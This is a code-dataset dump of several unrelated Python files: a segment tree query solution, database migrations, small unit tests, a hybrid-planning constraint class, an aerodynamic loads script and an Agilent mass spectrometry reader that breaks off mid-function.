max_stars_repo_path (stringlengths 4 to 197) | max_stars_repo_name (stringlengths 6 to 120) | max_stars_count (int64 0 to 191k) | id (stringlengths 1 to 8) | content (stringlengths 6 to 964k) | score (float64 -0.88 to 3.95) | int_score (int64 0 to 4) |
---|---|---|---|---|---|---|
Segment Tree Query II.py | RijuDasgupta9116/LintCode | 321 | 25604 | <filename>Segment Tree Query II.py
"""
For an array, we can build a SegmentTree for it; each node stores an extra attribute count to denote the number of
elements in the array whose value is between interval start and end. (The array may not be fully filled by elements.)
Design a query method with three parameters root, start and end, and find the number of elements in the array's
interval [start, end], given the root of the value SegmentTree.
Example
For array [0, empty, 2, 3], the corresponding value Segment Tree is:
[0, 3, count=3]
/ \
[0,1,count=1] [2,3,count=2]
/ \ / \
[0,0,count=1] [1,1,count=0] [2,2,count=1] [3,3,count=1]
query(1, 1), return 0
query(1, 2), return 1
query(2, 3), return 2
query(0, 2), return 2
"""
__author__ = 'Daniel'
DEFAULT = 0
f = lambda x, y: x+y
class Solution:
def query(self, root, s, e):
"""
Segment: [s, e]
:param root: the root of the segment tree
:param s: start of the segment/interval
:param e: end of the segment/interval
:return: the number of elements in the interval [s, e]
"""
if not root:
return DEFAULT
if s <= root.start and e >= root.end:
return root.count
if s > root.end or e < root.start:
return DEFAULT
l = self.query(root.left, s, e)
r = self.query(root.right, s, e)
return f(l, r)
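# A minimal usage sketch (not part of the original solution). The node class
# below is an assumption about the SegmentTree shape this query expects:
# each node carries start, end, count and left/right children.
class _Node:
    def __init__(self, start, end, count=0, left=None, right=None):
        self.start, self.end, self.count = start, end, count
        self.left, self.right = left, right

if __name__ == '__main__':
    # build the example tree for [0, empty, 2, 3] from the docstring
    root = _Node(0, 3, 3,
                 _Node(0, 1, 1, _Node(0, 0, 1), _Node(1, 1, 0)),
                 _Node(2, 3, 2, _Node(2, 2, 1), _Node(3, 3, 1)))
    assert Solution().query(root, 1, 2) == 1
    assert Solution().query(root, 0, 2) == 2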
| 3.125 | 3 |
migrations/versions/a2c88ed3a94a_.py | crossgovernmentservices/csd_notes | 0 | 25732 | """empty message
Revision ID: a2c88ed3a94a
Revises: None
Create Date: 2016-04-27 16:54:34.185442
"""
# revision identifiers, used by Alembic.
revision = 'a2c88ed3a94a'  # matches the migration filename prefix
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('role',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=True),
sa.Column('description', sa.String(length=255), nullable=True),
sa.PrimaryKeyConstraint('id', name=op.f('pk_role')),
sa.UniqueConstraint('name', name=op.f('uq_role_name'))
)
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('email', sa.String(length=255), nullable=True),
sa.Column('password', sa.String(), nullable=True),
sa.Column('full_name', sa.String(), nullable=True),
sa.Column('inbox_email', sa.String(length=255), nullable=True),
sa.Column('active', sa.Boolean(), nullable=True),
sa.Column('confirmed_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id', name=op.f('pk_user')),
sa.UniqueConstraint('email', name=op.f('uq_user_email')),
sa.UniqueConstraint('inbox_email', name=op.f('uq_user_inbox_email'))
)
op.create_table('note',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=True),
sa.Column('created', sa.DateTime(), nullable=True),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('is_email', sa.Boolean(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], name=op.f('fk_note_user_id_user')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_note'))
)
op.create_table('user_roles',
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('role_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['role_id'], ['role.id'], name=op.f('fk_user_roles_role_id_role')),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], name=op.f('fk_user_roles_user_id_user'))
)
op.create_table('note_history',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('note_id', sa.Integer(), nullable=True),
sa.Column('version', sa.Integer(), nullable=True),
sa.Column('content', sa.Text(), nullable=True),
sa.Column('created', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['note_id'], ['note.id'], name=op.f('fk_note_history_note_id_note')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_note_history'))
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('note_history')
op.drop_table('user_roles')
op.drop_table('note')
op.drop_table('user')
op.drop_table('role')
### end Alembic commands ###
| 1.203125 | 1 |
eventkit_cloud/jobs/migrations/0011_add_file_data_providers.py | venicegeo/eventkit-cloud | 1 | 25860 | # Generated by Django 3.1.2 on 2021-01-27 18:43
from django.db import migrations
class Migration(migrations.Migration):
def add_file_data_providers(apps, schema_editor):
DataProviderType = apps.get_model("jobs", "DataProviderType")
ExportFormat = apps.get_model("jobs", "ExportFormat")
# Create the DataProvider objects if they don't exist.
DataProviderType.objects.get_or_create(type_name="vector-file")
DataProviderType.objects.get_or_create(type_name="raster-file")
# Currently available Provider Types.
vector_data_provider_types = ["vector-file"]
raster_data_provider_types = ["raster-file"]
# Currently available Export Formats.
nitf = ExportFormat.objects.get(slug="nitf")
gtiff = ExportFormat.objects.get(slug="gtiff")
kml = ExportFormat.objects.get(slug="kml")
shp = ExportFormat.objects.get(slug="shp")
gpkg = ExportFormat.objects.get(slug="gpkg")
# Set the known supported export formats per provider type.
for provider_type in DataProviderType.objects.all():
if provider_type.type_name in vector_data_provider_types:
provider_type.supported_formats.add(gpkg, shp, kml)
if provider_type.type_name in raster_data_provider_types:
provider_type.supported_formats.add(gpkg, gtiff, nitf)
dependencies = [
("jobs", "0010_dataprovider_data_type"),
]
operations = [migrations.RunPython(add_file_data_providers)]
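    # A hedged variant (not in the original migration): RunPython also accepts
    # a reverse callable, so passing migrations.RunPython.noop as a second
    # argument would make this data migration formally reversible:
    #
    #     operations = [
    #         migrations.RunPython(add_file_data_providers, migrations.RunPython.noop)
    #     ]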
| 1.101563 | 1 |
tests/test_inchi.py | ginkgobioworks/pychemy | 3 | 25988 | <filename>tests/test_inchi.py
from __future__ import print_function
import unittest
import six
from pychemy.inchi import InChI
class InchiTest(unittest.TestCase):
def test_unicode_inchi(self):
inchi_str = six.u('InChI=1S/C14H18O8/c1-20-9-4-7(5-15)2-3-8(9)21-14-13(19)12(18)11(17)10(6-16)22-14/h2-5,10-14,16-19H,6H2,1H3/t10-,11-,12+,13-,14-/m1/s1')
inchi = InChI(inchi_str)
formula = inchi.formula
self.assertEqual(formula.formula, 'C14H18O8')
| 1.296875 | 1 |
src/tarski/fstrips/hybrid/differential_constraints.py | phoeft670/tarski | 29 | 26116 |
from ...syntax import BuiltinFunctionSymbol, CompoundTerm
from . import errors as err
class DifferentialConstraint:
""" A (possibly lifted) reaction """
def __init__(self, language, name, parameters, condition, variate, ode):
self.name = name
self.language = language
self.parameters = parameters
self.condition = condition
self.variate = variate
self.ode = ode
self._check_well_formed()
def _check_well_formed(self):
if not isinstance(self.variate, CompoundTerm):
raise err.InvalidDifferentialConstraintDefinition(self.variate, "Needs to be a compound term")
# variate is a CompoundTerm (checked above); its head symbol must not be built-in
if isinstance(self.variate.symbol, BuiltinFunctionSymbol):
raise err.InvalidDifferentialConstraintDefinition(self.variate, "Cannot be a built-in function")
# ....
def ident(self):
params = ', '.join([str(o) for o in self.parameters])
return '{}({})'.format(self.name, params)
def dump(self):
return dict(name=self.name,
params=[par.dump() for par in self.parameters],
condition=self.condition.dump(),
variate=self.variate.dump(),
ode=self.ode.dump())
def __str__(self):
tokens = ['differential constraint {}:'.format(self.name),
'cond: ({})'.format(self.condition),
'variate: {}'.format(self.variate),
'ode: {}'.format(self.ode)]
return '\n'.join(tokens)
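# A hypothetical construction sketch; `lang`, `cond`, `x_t` and `rate` stand
# in for real tarski language objects and are not actual API calls from this
# project:
#
#     dc = DifferentialConstraint(lang, 'cooling', parameters=[],
#                                 condition=cond, variate=x_t, ode=rate)
#     dc.ident()   # -> 'cooling()'
#     dc.dump()    # dict with name/params/condition/variate/ode entries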
| 1.804688 | 2 |
app/logic/mailing/tests/tests_management_SendMail.py | imvu/bluesteel | 10 | 26244 | """ StackedMail management command tests """
from django.test import TestCase
from django.test import Client
from django.conf import settings
from django.core import mail
from django.core.management import call_command
from django.utils.six import StringIO
from app.logic.mailing.models.StackedMailModel import StackedMailEntry
from app.logic.httpcommon import res
import os
import shutil
class ManagementStackedMailTestCase(TestCase):
def setUp(self):
self.client = Client()
self.tmp_folder = os.path.join(settings.TMP_ROOT)
if not os.path.exists(self.tmp_folder):
os.makedirs(self.tmp_folder)
def tearDown(self):
if os.path.exists(self.tmp_folder):
shutil.rmtree(self.tmp_folder)
def create_stacked_email(self, sender, receiver, title, msg, sent):
StackedMailEntry.objects.create(
receiver=receiver,
sender=sender,
title=title,
content=msg,
is_sent=sent
)
def test_command_output(self):
self.create_stacked_email('<EMAIL>', '<EMAIL>', 'Title1', 'Body1', True)
self.create_stacked_email('<EMAIL>', '<EMAIL>', 'Title2', 'Body2', False)
self.create_stacked_email('<EMAIL>', '<EMAIL>', 'Title3', 'Body3', False)
self.create_stacked_email('<EMAIL>', '<EMAIL>', 'Title4', 'Body4', False)
out = StringIO()
call_command('sendmail', stdout=out)
self.assertIn('', out.getvalue())
mail.outbox.sort(key=lambda x: x.to[0])
self.assertEqual('<EMAIL>', mail.outbox[0].to[0])
self.assertEqual('<EMAIL>', mail.outbox[0].from_email)
self.assertEqual('<EMAIL>', mail.outbox[1].to[0])
self.assertEqual('<EMAIL>', mail.outbox[1].from_email)
self.assertEqual('<EMAIL>', mail.outbox[2].to[0])
self.assertEqual('<EMAIL>', mail.outbox[2].from_email)
emails = StackedMailEntry.objects.all()
for email in emails:
self.assertEqual(True, email.is_sent)
| 1.960938 | 2 |
app/blog/blog_entries/migrations/0002_remove_article_for_adult.py | Risoko/DRF-Auth-With-Blog-Entries | 0 | 26372 | # Generated by Django 3.0.1 on 2020-01-08 08:47
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog_entries', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='article',
name='for_adult',
),
]
| 0.769531 | 1 |
cfdutils/examples/onera/onera.py | acrovato/pycfdutils | 0 | 26500 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf8 -*-
# test encoding: à-é-è-ô-ï-€
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Onera M6 wing
# <NAME>
def inputs():
'''Inputs definition
'''
p = {}
p['File'] = 'surface_flow' # file containing the flow solution
p['Format'] = 'dat' # file format (dat = Tecplot ASCII, vtk = VTK ASCII, vtu = VTK)
p['Cuts'] = [0.01, 0.24, 0.53, 0.78, 0.96, 1.08, 1.14, 1.18] # y-coordinates of the slices
p['Tag'] = [None, None] # tag number and name if the solution is provided not only on the wing surface
p['Variable'] = 'Pressure_Coefficient' # name of variable to extract
p['AoA'] = 3.06 # angle of attack (degrees)
return p
def cLoads(p):
'''Extract several slices along the wing span and compute the sectional aerodynamic load coefficients
'''
import cfdutils.tools.vtku as vu
import cfdutils.tools.loads as lu
# Define reader
reader = vu.Reader()
reader.open(p['File'], p['Format'])
# Create slices
cutter = vu.Cutter(reader.grid)
loads = lu.Loads()
for i in range(0, len(p['Cuts'])):
cutter.cut([0., p['Cuts'][i], 0.], [0., 1., 0.], p['Tag'][0], p['Tag'][1])
pts, elems, vals = cutter.extract(2, [p['Variable']])
loads.add(p['Cuts'][i], pts, vals[p['Variable']])
# Compute loads
loads.compute(p['AoA'])
loads.display()
loads.plot()
loads.write()
def mkchdirexec(dirname, p):
'''Create a directory if it does not exist, change to it and execute
'''
import os
dir = os.path.join(os.getcwd(), dirname)
if not os.path.isdir(dir):
os.makedirs(dir)
os.chdir(dir)
p['File'] = os.path.join(os.path.split(__file__)[0], p['File']) # to get relative path to this file
cLoads(p)
os.chdir('..')
def main():
# Get inputs
p = inputs()
# Compute loads for several file formats...
# Tecplot ASCII, computed using SU2 (https://github.com/su2code/SU2/releases/tag/v7.0.6)
print('--- SU2 - surface - Tecplot ASCII ---')
p['Format'] = 'dat'
mkchdirexec('Tecplot_ASCII', p)
# VTK ASCII, computed using SU2
print('--- SU2 - surface - VTK ASCII ---')
p['Format'] = 'vtk'
mkchdirexec('VTK_ASCII', p)
# VTK binary, computed using SU2
print('--- SU2 - surface - VTK binary ---')
p['Format'] = 'vtu'
mkchdirexec('VTK_bin', p)
# VTK binary, computed using Flow v1.9.2 (https://gitlab.uliege.be/am-dept/waves/-/releases)
print('--- Flow - field - VTK binary ---')
p['File'] = 'flow'
p['Tag'] = [5, 'tag']
p['Variable'] = 'Cp'
mkchdirexec('VTK_bin2', p)
if __name__ == "__main__":
main() | 2.265625 | 2 |
src/models/exif_sc/__init__.py | lemonwaffle/nisemono | 7 | 26628 | from .exif_sc import EXIF_SC
from .networks import EXIF_Net | 0.084473 | 0 |
ms_deisotope/data_source/_vendor/AgilentD.py | mobiusklein/ms_deisotope | 18 | 26756 | <gh_stars>10-100
import os
import glob
import warnings
import logging
from collections import deque
from six import string_types as basestring
from lxml import etree
try:
log = logging.getLogger(os.path.basename(__file__))
except Exception:
log = None
from collections import OrderedDict, defaultdict
from weakref import WeakValueDictionary
try:
WindowsError
except NameError:
raise ImportError("Platform Not Supported")
try:
import comtypes
from comtypes.client import GetModule, CreateObject
except (ImportError, NameError) as e:
raise ImportError("Could not import comtypes")
import numpy as np
from ms_deisotope.data_source.common import (
ScanDataSource,
RandomAccessScanSource,
Scan,
ScanBunch,
PrecursorInformation,
ActivationInformation,
IsolationWindow,
InstrumentInformation,
ComponentGroup,
component,
FileInformation,
SourceFile,
ScanAcquisitionInformation,
ScanEventInformation,
ScanWindow)
try:
# Load previously built COM wrapper
from comtypes.gen import (
MassSpecDataReader,
BaseCommon,
BaseDataAccess)
DLL_IS_LOADED = True
except (ImportError, TypeError):
DLL_IS_LOADED = False
_default_paths = []
def _register_dll_dir(search_paths=None):
from ms_deisotope.config import get_config
if search_paths is None:
search_paths = []
global DLL_IS_LOADED
if DLL_IS_LOADED:
return True
search_paths = list(search_paths)
search_paths.extend(_default_paths)
search_paths.extend(get_config().get('vendor_readers', {}).get('agilent-com', []))
for dll_dir in search_paths:
try:
GetModule(os.path.join(dll_dir, 'MassSpecDataReader.tlb'))
GetModule(os.path.join(dll_dir, 'BaseCommon.tlb'))
GetModule(os.path.join(dll_dir, 'BaseDataAccess.tlb'))
DLL_IS_LOADED = True
return True
except Exception:
continue
else:
return False
def register_dll_dir(search_paths=None):
if search_paths is None:
search_paths = []
if isinstance(search_paths, basestring):
search_paths = [search_paths]
loaded = _register_dll_dir(search_paths)
if not loaded:
log.debug("Could not resolve Agilent-related DLL")
search_paths.extend(_default_paths)
msg = '''
1) The MassSpecDataReader, BaseCommon, BaseDataAccess DLLs/TLBs may not be installed and
therefore not registered to the COM server.
2) The MassSpecDataReader, BaseCommon, BaseDataAccess DLLs/TLBs may not be on these paths:
%s
''' % ('\n'.join(search_paths))
raise ImportError(msg)
class CaseInsensitiveDict(dict):
def __init__(self, template=None):
if isinstance(template, dict):
template = {k.lower(): v for k, v in template.items()}
dict.__init__(self, template)
def __getitem__(self, key):
key = key.lower()
return dict.__getitem__(self, key)
def __delitem__(self, key):
return super(CaseInsensitiveDict, self).__delitem__(key.lower())
def __setitem__(self, key, value):
key = key.lower()
return dict.__setitem__(self, key, value)
def __contains__(self, key):
return super(CaseInsensitiveDict, self).__contains__(key.lower())
device_to_component_group_map = CaseInsensitiveDict({
"QTOF": [
ComponentGroup("analyzer", [component("quadrupole")], 2),
ComponentGroup("analyzer", [component("quadrupole")], 3),
ComponentGroup("analyzer", [component("time-of-flight")], 4)
],
"Quadrupole": [
ComponentGroup("analyzer", [component("quadrupole")], 2),
],
"TandemQuadrupole": [
ComponentGroup("analyzer", [component("quadrupole")], 2),
ComponentGroup("analyzer", [component("quadrupole")], 3),
ComponentGroup("analyzer", [component("quadrupole")], 4)
],
"IonTrap": [
ComponentGroup("analyzer", [component("iontrap")], 2)
],
"TOF": [
ComponentGroup("analyzer", [component("time-of-flight")], 2)
]
})
polarity_map = {
1: -1,
0: 1,
3: 0,
2: None
}
ion_mode_map = {
0: 'Unspecified',
1: 'Mixed',
2: 'EI',
4: 'CI',
8: 'Maldi',
16: 'Appi',
32: 'Apci',
64: 'ESI',
128: 'NanoEsi',
512: 'MsChip',
1024: 'ICP',
2048: 'Jetstream'
}
ionization_map = CaseInsensitiveDict({
"EI": component("electron ionization"),
"CI": component("chemical ionization"),
"ESI": component("electrospray ionization"),
"NanoEsi": component("nanoelectrospray"),
"Appi": component('atmospheric pressure photoionization'),
"Apci": component("atmospheric pressure chemical ionization"),
"Maldi": component("matrix assisted laser desorption ionization"),
"MsChip": component("nanoelectrospray"),
"ICP": component("plasma desorption ionization"),
"Jetstream": component("nanoelectrospray")
})
inlet_map = CaseInsensitiveDict({
"EI": component("direct inlet"),
"CI": component("direct inlet"),
"Maldi": component("particle beam"),
"Appi": component("direct inlet"),
"Apci": component("direct inlet"),
"Esi": component("electrospray inlet"),
"NanoEsi": component("nanospray inlet"),
"MsChip": component("nanospray inlet"),
"ICP": component("component(inductively coupled plasma"),
"JetStream": component("nanospray inlet"),
})
peak_mode_map = {
'profile': 0,
'centroid': 1,
'profilepreferred': 2,
'centroidpreferred': 3
}
device_type_map = {
0: 'Unknown',
1: 'Mixed',
2: 'Quadrupole',
3: 'IsocraticPump',
4: 'TOF',
5: 'TandemQuadrupole',
6: 'QTOF',
10: 'FlourescenceDetector',
11: 'ThermalConductivityDetector',
12: 'RefractiveIndexDetector',
13: 'MultiWavelengthDetector',
14: 'ElectronCaptureDetector',
15: 'VariableWavelengthDetector',
16: 'AnalogDigitalConverter',
17: 'EvaporativeLightScatteringDetector',
18: 'GCDetector',
19: 'FlameIonizationDetector',
20: 'ALS',
21: 'WellPlateSampler',
22: 'MicroWellPlateSampler',
23: 'DiodeArrayDetector',
31: 'CANValves',
32: 'QuaternaryPump',
33: 'ChipCube',
34: 'Nanopump',
40: 'ThermostattedColumnCompartment',
41: 'CTC',
42: 'CapillaryPump',
50: 'IonTrap'
}
scan_type_map = CaseInsensitiveDict({
"Unspecified": 0,
"All": 7951,
"AllMS": 15,
"AllMSN": 7936,
"Scan": 1,
"SelectedIon": 2,
"HighResolutionScan": 4,
"TotalIon": 8,
"MultipleReaction": 256,
"ProductIon": 512,
"PrecursorIon": 1024,
"NeutralLoss": 2048,
"NeutralGain": 4096
})
PEAK_MODE = 0
def make_scan_id_string(scan_id):
return "scanId=%s" % (scan_id,)
class AgilentDScanPtr(object):
def __init__(self, index):
self.index = index
def __repr__(self):
return "AgilentDScanPtr(%d)" % (self.index,)
class AgilentDDataInterface(ScanDataSource):
def _get_spectrum_obj(self, scan, peak_mode=PEAK_MODE):
index = scan.index
spectrum = self.source.GetSpectrum_8(rowNumber=index, storageType=peak_mode)
return spectrum
def _get_scan_record(self, scan):
index = scan.index
record = self.source.GetScanRecord(index)
return record
def _scan_index(self, scan):
return scan.index
def _scan_id(self, scan):
record = self._get_scan_record(scan)
return make_scan_id_string(record.ScanId)
def _scan_title(self, scan):
return self._scan_id(scan)
def _scan_arrays(self, scan):
spectrum = self._get_spectrum_obj(scan)
return (np.array(spectrum.XArray, dtype=float),
np.array(spectrum.YArray, dtype=float))
def _polarity(self, scan):
record = self._get_scan_record(scan)
polarity_enum = record.IonPolarity
polarity = polarity_map.get(polarity_enum)
if polarity in (0, None):
warnings.warn("Unknown Scan Polarity: %r" % (polarity,))
return polarity
def _scan_time(self, scan):
record = self._get_scan_record(scan)
return record.retentionTime
def _is_profile(self, scan):
spectrum_obj = self._get_spectrum_obj(scan)
mode = spectrum_obj.MSStorageMode
return mode in (0, 2, 3)
def _ms_level(self, scan):
record = self._get_scan_record(scan)
return record.MSLevel
def _precursor_information(self, scan):
if self._ms_level(scan) < 2:
return None
spectrum_obj = self._get_spectrum_obj(scan)
precursor_scan_id = make_scan_id_string(spectrum_obj.ParentScanId)
n, ions = spectrum_obj.GetPrecursorIon()
if n < 1:
return None
mz = ions[0]
charge, _ = spectrum_obj.GetPrecursorCharge()
intensity, _ = spectrum_obj.GetPrecursorIntensity()
return PrecursorInformation(mz, intensity, charge, precursor_scan_id, self)
def _acquisition_information(self, scan):
spectrum_obj = self._get_spectrum_obj(scan)
try:
low = spectrum_obj.MeasuredMassRange.Start
high = spectrum_obj.MeasuredMassRange.End
except Exception:
arrays = self._scan_arrays(scan)
mz_array = arrays[0]
if len(mz_array) != 0:
low = mz_array.min()
high = mz_array.max()
else:
low = high = 0
window = ScanWindow(low, high)
event = ScanEventInformation(
self._scan_time(scan),
window_list=[window])
return ScanAcquisitionInformation("no combination", [event])
def _activation(self, scan):
record = self._get_scan_record(scan)
return ActivationInformation('cid', record.CollisionEnergy)
def _isolation_window(self, scan):
if self._ms_level(scan) < 2:
return None
spectrum_obj = self._get_spectrum_obj(scan)
n, ions = spectrum_obj.GetPrecursorIon()
if n < 1:
return None
return IsolationWindow(0, ions[0], 0)
def _instrument_configuration(self, scan):
return self._instrument_config[1]
class _AgilentDDirectory(object):
@staticmethod
def create_com_object():
if not DLL_IS_LOADED:
raise WindowsError("Could not locate Agilent DLLs")
reader = CreateObject('Agilent.MassSpectrometry.DataAnalysis.MassSpecDataReader')
return reader
@staticmethod
def create_com_object_filter():
if not DLL_IS_LOADED:
raise WindowsError("Could not locate Agilent DLLs")
no_filter = CreateObject('Agilent.MassSpectrometry.DataAnalysis.MsdrPeakFilter')
return no_filter
@staticmethod
def is_valid(path):
if os.path.exists(path):
if os.path.isdir(path):
return os.path.exists(os.path.join(path, "AcqData", "Contents.xml"))
return False
class _AgilentMethod(object):
def __init__(self, method_parameters):
self.parameters = list(method_parameters)
def __getitem__(self, i):
return self.parameters[i]
def __len__(self):
return len(self.parameters)
def __iter__(self):
return iter(self.parameters)
def __repr__(self):
return "_AgilentMethod(%d)" % (len(self),)
def search_by_name(self, name):
for param in self:
try:
if param['Name'].lower() == name.lower():
return param
except (AttributeError, KeyError):
continue
class _AgilentDMetadataLoader(object):
def _has_ms1_scans(self):
return bool(self._scan_types_flags & scan_type_map['Scan'])
def _has_msn_scans(self):
return bool(self._scan_types_flags & scan_type_map['ProductIon'])
def has_msn_scans(self):
return self._has_msn_scans()
def has_ms1_scans(self):
return self._has_ms1_scans()
def file_description(self):
fi = FileInformation(contents={}, source_files=[])
if self._has_ms1_scans():
fi.add_content("MS1 spectrum")
if self._has_msn_scans():
fi.add_content("MSn spectrum")
basename = os.path.basename
dirname = os.path.dirname
file_queue = deque()
file_queue.extend(glob.glob(os.path.join(self.dirpath, "AcqData", "*")))
# for source_file in file_queue:
while file_queue:
source_file = file_queue.popleft()
if os.path.isdir(source_file):
file_queue.extendleft(glob.glob(os.path.join(source_file, "*")))
else:
sf = SourceFile(
basename(source_file), dirname(source_file),
None, *("Agilent MassHunter nativeID format", "Agilent MassHunter format"))
sf.add_checksum("sha1")
fi.add_file(sf, check=False)
return fi
def _get_instrument_info(self):
ion_modes_flags = self.source.MSScanFileInformation.IonModes
ionization = []
for bit, label in ion_mode_map.items():
if ion_modes_flags & bit:
ionization.append(label)
configs = []
i = 1
for ionizer in ionization:
groups = [ComponentGroup("source", [ionization_map[ionizer], inlet_map[ionizer]], 1)]
groups.extend(device_to_component_group_map[self.device])
config = InstrumentInformation(i, groups)
i += 1
configs.append(config)
self._instrument_config = {
c.id: c for c in configs
}
return configs
def instrument_configuration(self):
return sorted(self._instrument_config.values(), key=lambda x: x.id)
def data_processing(self):
return []
def _acquisition_method_xml_path(self):
return os.path.join(self.dirpath, "AcqData", "AcqMethod.xml")
def _parse_method_xml(self):
try:
path = self._acquisition_method_xml_path()
tree = etree.parse(path)
nsmap = {"ns": "http://tempuri.org/DataFileReport.xsd"}
elt = tree.find(".//ns:SCICDevicesXml", namespaces=nsmap)
method_xml = etree.fromstring(elt.text)
except (IOError, OSError, ValueError, TypeError) as e:
print(e)
self._method = []
return self._method
method = list()
for section in method_xml.iterfind(".//SectionInfo"):
section_dict = {}
for child in section:
name = child.tag
value = child.text
section_dict[name] = value
method.append(section_dict)
method = _AgilentMethod(method)
self._method = method
return method
_ADM = _AgilentDMetadataLoader
_ADD = _AgilentDDirectory
class AgilentDLoader(AgilentDDataInterface, _ADD, RandomAccessScanSource, _ADM):
def __init__(self, dirpath, **kwargs):
self.dirpath = dirpath
self.dirpath = os.path.abspath(self.dirpath)
self.dirpath = os.path.normpath(self.dirpath)
self.source = self.create_com_object()
self.filter = self.create_com_object_filter()
try:
self.source.OpenDataFile(self.dirpath)
except comtypes.COMError as err:
raise IOError(str(err))
self._TIC = self.source.GetTIC()
self.device = self._TIC.DeviceName
self._n_spectra = self._TIC.TotalDataPoints
self._scan_types_flags = self.source.MSScanFileInformation.ScanTypes
self._producer = self._scan_group_iterator()
self.initialize_scan_cache()
self._index = self._pack_index()
self._get_instrument_info()
def __reduce__(self):
return self.__class__, (self.dirpath,)
@property
def index(self):
return self._index
def __len__(self):
return len(self.index)
def __repr__(self):
return "AgilentDLoader(%r)" % (self.dirpath)
def reset(self):
self.make_iterator(None)
self.initialize_scan_cache()
def close(self):
# seems to make attempting to re-open the same datafile cause a segfault
# self.source.CloseDataFile()
self._dispose()
def _pack_index(self):
index = OrderedDict()
for sn in range(self._n_spectra):
rec = self._get_scan_record(AgilentDScanPtr(sn))
index[make_scan_id_string(rec.ScanId)] = sn
return index
def _make_pointer_iterator(self, start_index=None, start_time=None):
iterator = self._make_scan_index_producer(start_index, start_time)
for i in iterator:
yield AgilentDScanPtr(i)
def _make_default_iterator(self):
return self._make_pointer_iterator()
def _make_scan_index_producer(self, start_index=None, start_time=None):
if start_index is not None:
return range(start_index, self._n_spectra)
elif start_time is not None:
start_index = self.source.ScanNumFromRT(start_time)
while start_index != 0:
scan = self.get_scan_by_index(start_index)
if scan.ms_level > 1:
start_index -= 1
else:
break
return range(start_index, self._n_spectra)
else:
return range(0, self._n_spectra)
def get_scan_by_id(self, scan_id):
"""Retrieve the scan object for the specified scan id.
If the scan object is still bound and in memory somewhere,
a reference to that same object will be returned. Otherwise,
a new object will be created.
Parameters
----------
scan_id : str
The unique scan id value to be retrieved
Returns
-------
Scan
"""
index = self._index[scan_id]
return self.get_scan_by_index(index)
def get_scan_by_index(self, index):
"""Retrieve the scan object for the specified scan index.
This internally calls :meth:`get_scan_by_id` which will
use its cache.
Parameters
----------
index: int
The index to get the scan for
Returns
-------
Scan
"""
scan_number = int(index)
try:
return self._scan_cache[scan_number]
except KeyError:
package = AgilentDScanPtr(scan_number)
scan = Scan(package, self)
self._cache_scan(scan)
return scan
def get_scan_by_time(self, time):
# binary search over the TIC retention-time array for the scan nearest `time`
time_array = self._TIC.XArray
lo = 0
hi = self._n_spectra
if time == float('inf'):
return self.get_scan_by_index(len(self) - 1)
best_match = None
best_error = float('inf')
while hi != lo:
mid = (hi + lo) // 2
scan_time = time_array[mid]
err = abs(scan_time - time)
if err < best_error:
best_error = err
best_match = mid
if scan_time == time:
return self.get_scan_by_index(mid)
elif (hi - lo) == 1:
return self.get_scan_by_index(best_match)
elif scan_time > time:
hi = mid
else:
lo = mid
def start_from_scan(self, scan_id=None, rt=None, index=None, require_ms1=True, grouped=True):
'''Reconstruct an iterator which will start from the scan matching one of ``scan_id``,
``rt``, or ``index``. Only one may be provided.
After invoking this method, the iterator this object wraps will be changed to begin
yielding scan bunchs (or single scans if ``grouped`` is ``False``).
Arguments
---------
scan_id: str, optional
Start from the scan with the specified id.
rt: float, optional
Start from the scan nearest to specified time (in minutes) in the run. If no
exact match is found, the nearest scan time will be found, rounded up.
index: int, optional
Start from the scan with the specified index.
require_ms1: bool, optional
Whether the iterator must start from an MS1 scan. True by default.
grouped: bool, optional
whether the iterator should yield scan bunches or single scans. True by default.
'''
if scan_id is not None:
scan_number = self.get_scan_by_id(scan_id).index
elif index is not None:
scan_number = int(index)
elif rt is not None:
scan_number = self.get_scan_by_time(rt).index
if require_ms1:
start_index = scan_number
while start_index != 0:
scan = self.get_scan_by_index(start_index)
if scan.ms_level > 1:
start_index -= 1
else:
break
scan_number = start_index
iterator = self._make_scan_index_producer(start_index=scan_number)
if grouped:
self._producer = self._scan_group_iterator(iterator)
else:
self._producer = self._single_scan_iterator(iterator)
return self
def _make_cache_key(self, scan):
return scan._data.index
def _single_scan_iterator(self, iterator=None, mode=None):
if iterator is None:
iterator = self._make_scan_index_producer()
for ix in iterator:
packed = self.get_scan_by_index(ix)
self._cache_scan(packed)
yield packed
def _scan_group_iterator(self, iterator=None, mode=None):
if iterator is None:
iterator = self._make_scan_index_producer()
precursor_scan = None
product_scans = []
current_level = 1
for ix in iterator:
packed = self.get_scan_by_index(ix)
self._cache_scan(packed)
if packed.ms_level > 1:
# increasing ms level
if current_level < packed.ms_level:
current_level = packed.ms_level
# decreasing ms level
elif current_level > packed.ms_level:
current_level = packed.ms_level
product_scans.append(packed)
elif packed.ms_level == 1:
if current_level > 1 and precursor_scan is not None:
precursor_scan.product_scans = list(product_scans)
yield ScanBunch(precursor_scan, product_scans)
else:
if precursor_scan is not None:
precursor_scan.product_scans = list(product_scans)
